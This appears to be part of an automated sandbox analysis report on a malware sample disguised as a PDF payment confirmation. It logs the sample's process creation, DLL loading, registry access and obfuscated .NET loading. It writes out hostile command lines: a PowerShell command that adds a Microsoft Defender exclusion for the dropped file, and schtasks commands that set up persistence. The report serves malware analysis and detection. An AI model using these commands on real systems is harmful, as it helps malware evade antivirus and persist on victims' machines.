                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cQwRvD.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeProcess created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cQwRvD.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: ieframe.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: netapi32.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: mlang.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: winsqlite3.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeSection loaded: wininet.dll
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeSection loaded: mswsock.dll
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeSection loaded: dnsapi.dll
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeSection loaded: iphlpapi.dll
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeSection loaded: fwpuclnt.dll
                      Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\sdiagnhost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: Payment_Confirmation_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Payment_Confirmation_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mYtMtAAMpAtCOL.exe, 00000012.00000002.2559391595.0000000000FFE000.00000002.00000001.01000000.0000000E.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2549133517.0000000000FFE000.00000002.00000001.01000000.0000000E.sdmp
                      Source: Binary string: RegSvcs.pdb, source: sdiagnhost.exe, 00000013.00000002.2566048825.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000907000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.1959082934.000000002734C000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1655294935.00000000045D4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1652836303.0000000004424000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.000000000491E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.0000000004780000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1655294935.00000000045D4000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1652836303.0000000004424000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.000000000491E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2564239904.0000000004780000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: sdiagnhost.pdb source: RegSvcs.exe, 0000000A.00000002.1652980431.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000003.1847590518.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: RegSvcs.pdb source: sdiagnhost.exe, 00000013.00000002.2566048825.0000000004DAC000.00000004.10000000.00040000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000907000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.1959082934.000000002734C000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: sdiagnhost.pdbGCTL source: RegSvcs.exe, 0000000A.00000002.1652980431.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000012.00000003.1847590518.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: 0.2.Payment_Confirmation_pdf.exe.4145828.1.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.Payment_Confirmation_pdf.exe.5bc0000.4.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, XZoroxKebvtGCIPa9b.cs.Net Code: zcGMN63wFd System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, XZoroxKebvtGCIPa9b.cs.Net Code: zcGMN63wFd System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exeCode function: 0_2_013BEFB0 push esp; iretd 0_2_013BEFB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00403210 push eax; ret 10_2_00403212
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004182DA pushad ; ret 10_2_004182DC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00411B76 push cs; ret 10_2_00411B7F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040D3D2 push es; ret 10_2_0040D3D3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040838E push ebp; ret 10_2_0040838F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004084C0 push eax; retf 10_2_00408556
